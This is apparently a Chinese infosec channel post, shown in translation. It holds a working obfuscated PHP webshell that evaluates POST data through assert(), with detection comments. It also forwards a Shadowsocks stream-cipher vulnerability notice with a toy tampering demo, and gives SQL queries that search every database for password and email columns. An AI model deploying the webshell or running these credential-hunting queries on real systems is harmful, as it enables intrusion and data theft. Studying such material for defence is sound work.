[This channel is purely for technical sharing]
About this channel
This channel hopes to be a lighthouse, lighting the way for friends interested in the field of information security.
Existence has meaning. The purpose of this channel:
Web resource filter: sharing and collecting infosec material of reasonable quality (including but not limited to web security, penetration testing and APT)
Original content machine: summaries of knowledge points and articles that help beginners get started
Not an expert; some immature sharing that also helps me consolidate and digest what I learn
#ResourceSharing
For beginners this is a fairly comprehensive and systematic set of video tutorials; if you have the patience, working through the whole course is enough to get started. People at different levels will experience it differently and learn different things. Absorb the knowledge in it, supplement it with the documentation, and broaden your knowledge. https://telegra.ph/%E5%88%86%E4%BA%AB%E4%B8%80%E5%A5%97Web%E5%AE%89%E5%85%A8%E5%85%A5%E9%97%A8%E6%95%99%E7%A8%8B-10-25
<?php
// Obfuscated assert()-based webshell sample: the function name is assembled from
// byte values and the request body is evaluated as PHP code. Detection hints for
// defenders: chr()-built strings and a variable function call on request data.
// (assert() stopped evaluating string arguments in PHP 8.0; this runs on PHP 5/7.)
class ass{
    public static function toStr($bytes) {
        // Rebuild a string from an array of byte values, one chr() per element
        $str = '';
        foreach($bytes as $ch) {
            $str .= chr($ch);
        }
        return $str;
    }
    function getac(){
        // Returns the raw POST parameter 'a', hidden inside a nested array
        $cars = array(array("Volvo",100,$_POST['a']));
        return $cars[0][2];
    }
}
$asser = array(97,115,115,101,114,116);   // byte values of "assert"
$ccc = new ass();
$acx = $ccc->toStr($asser);
$acx($ccc->getac());   // variable-function call: assert($_POST['a'])
?>
Forwarded from 科技圈的日常 (Jimmy Tian)
A paper disclosed today by Qihoo 360's Core Security team shows:
Shadowsocks stream encryption has a vulnerability that allows the packet header to be modified.
An attacker can use the modified packet to perform a "redirect", and from there carry out a MITM attack.
Currently affected: shadowsocks-py, shadowsocks-go, shadowsocks-nodejs
The researchers recommend using only shadowsocks-libev with one of the following three ciphers:
aes-gcm chacha-ietf-poly1305 xchacha20-ietf-poly1305 (note: SSR does not support any of them)
POC and paper: https://github.com/edwardz246003/shadowsocks
Excerpt from the original:
A passive attacker can easily decrypt all the encrypted shadowsocks packets using our redirect attack. Even more, a man-in-the-middle attacker can modify traffic in real time like there is no encryption at all.
What surprised us was that only shadowsocks-libev supports AEAD ciphers. All other official implementations only support stream ciphers. This means that the data integrity and authenticity of most SS users is not guaranteed against a MitM attacker.
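The property the recommendation above turns on, as an added illustration that is not part of the forwarded post or of any Shadowsocks implementation: an unauthenticated stream cipher decrypts a modified ciphertext to a silently altered header, while an authenticated construction (the integrity guarantee AEAD ciphers such as aes-gcm provide) rejects the modification before the data is used. The HMAC-based keystream, key, nonce and packet are constructed stand-ins, not the real Shadowsocks ciphers.

```python
import hashlib, hmac

# Toy construction (added example, not Shadowsocks code): an XOR stream cipher
# with no authentication, beside the same cipher under encrypt-then-MAC, which
# gives the integrity property the recommended AEAD ciphers provide.
def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Counter-mode keystream from HMAC-SHA256 (stand-in for a real cipher)."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, nonce + counter.to_bytes(8, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]

def stream_encrypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Unauthenticated stream mode: XOR with keystream; decryption is the same call."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, nonce, len(data))))

def tamper(blob: bytes, offset: int, mask: int) -> bytes:
    """Flip bits in one ciphertext byte; with XOR ciphers the plaintext byte flips too."""
    out = bytearray(blob)
    out[offset] ^= mask
    return bytes(out)

def authenticated_encrypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Encrypt-then-MAC with a separate MAC key: ciphertext || HMAC(nonce||ciphertext)."""
    ct = stream_encrypt(key, nonce, data)
    mac_key = hashlib.sha256(b"mac" + key).digest()
    return ct + hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()

def authenticated_decrypt(key: bytes, nonce: bytes, blob: bytes) -> bytes:
    """Verify the tag in constant time before decrypting; reject any modification."""
    ct, tag = blob[:-32], blob[-32:]
    mac_key = hashlib.sha256(b"mac" + key).digest()
    if not hmac.compare_digest(tag, hmac.new(mac_key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("integrity check failed: ciphertext was modified")
    return stream_encrypt(key, nonce, ct)

def demo() -> tuple:
    key, nonce = b"k" * 32, b"n" * 8       # constructed sample key and nonce
    packet = b"TYPE=01;DATA=hello"         # constructed packet; TYPE is the "header"
    # Stream mode: one flipped ciphertext bit changes the header and decrypts cleanly.
    altered = stream_encrypt(key, nonce, tamper(stream_encrypt(key, nonce, packet), 6, 0x01))
    # Authenticated mode: the same flip is detected before the data is used.
    try:
        authenticated_decrypt(key, nonce, tamper(authenticated_encrypt(key, nonce, packet), 6, 0x01))
        rejected = False
    except ValueError:
        rejected = True
    return altered, rejected   # (b"TYPE=00;DATA=hello", True)
```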
## Database information retrieval tips
Partly excerpted from the web
SQL Server, all databases:
===================================================================
declare @i int,@id int,@dbname varchar(255),@sql varchar(4000)
set @i = 6  -- counter starts at 6, so the loop begins at dbid 7 and skips the lowest dbids (system databases)
set @id=(select count(*) from master..sysdatabases)
if object_id('tempdb..#t') is not null drop table #t  -- an unconditional drop errors when #t does not exist yet
create table #t (
dbname varchar(255),
tablename varchar(255),
columnname varchar(255)
)
while (@i < @id)
begin
set @i = @i + 1;
set @dbname = (select name from master..sysdatabases where dbid= @i)
-- collect columns whose names suggest credentials or e-mail addresses; quotename() handles names with spaces
set @sql = 'use '+ quotename(@dbname)+';insert [#t] select table_catalog,table_name,column_name from information_schema.columns where column_name like ''%pass%'' or column_name like ''%pwd%'' or column_name like ''%mail%'''
exec (@sql)
--print @sql
end
select * from #t
drop table #t
go
SQL Server, single database:
====================================================================
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND (syscolumns.name LIKE '%pass%' or syscolumns.name LIKE '%pwd%' or syscolumns.name LIKE '%first%');
MySQL, all databases:
===================================================================
select table_schema,table_name,column_name from information_schema.columns where table_schema !=0x696E666F726D6174696F6E5F736368656D61 and table_schema !=0x6D7973716C and table_schema !=0x706572666F726D616E63655F736368656D61 and (column_name like '%pass%' or column_name like '%pwd%');
SQL Server, search every table of the current database for a keyword string
===================================================================
declare @str varchar(100)
set @str='test' -- the string to search for
declare @s varchar(8000)
declare tb cursor local for
select s='if exists(select 1 from ['+b.name+'] where ['+a.name+'] like ''%'+@str+'%'')
print ''所在的表及字段: ['+b.name+'].['+a.name+']'''
from syscolumns a join sysobjects b on a.id=b.id
where b.xtype='U' and a.status>=0
and a.xusertype in(175,239,231,167)
open tb
fetch next from tb into @s
while @@fetch_status=0
begin
exec(@s)
fetch next from tb into @s
end
close tb
deallocate tb
## Fuzzy search for table names
SELECT sysobjects.name as tablename, sysobjects.xtype as xtype FROM sysobjects
where (sysobjects.xtype = 'U' or sysobjects.xtype = 'V') and sysobjects.name like '%Event%'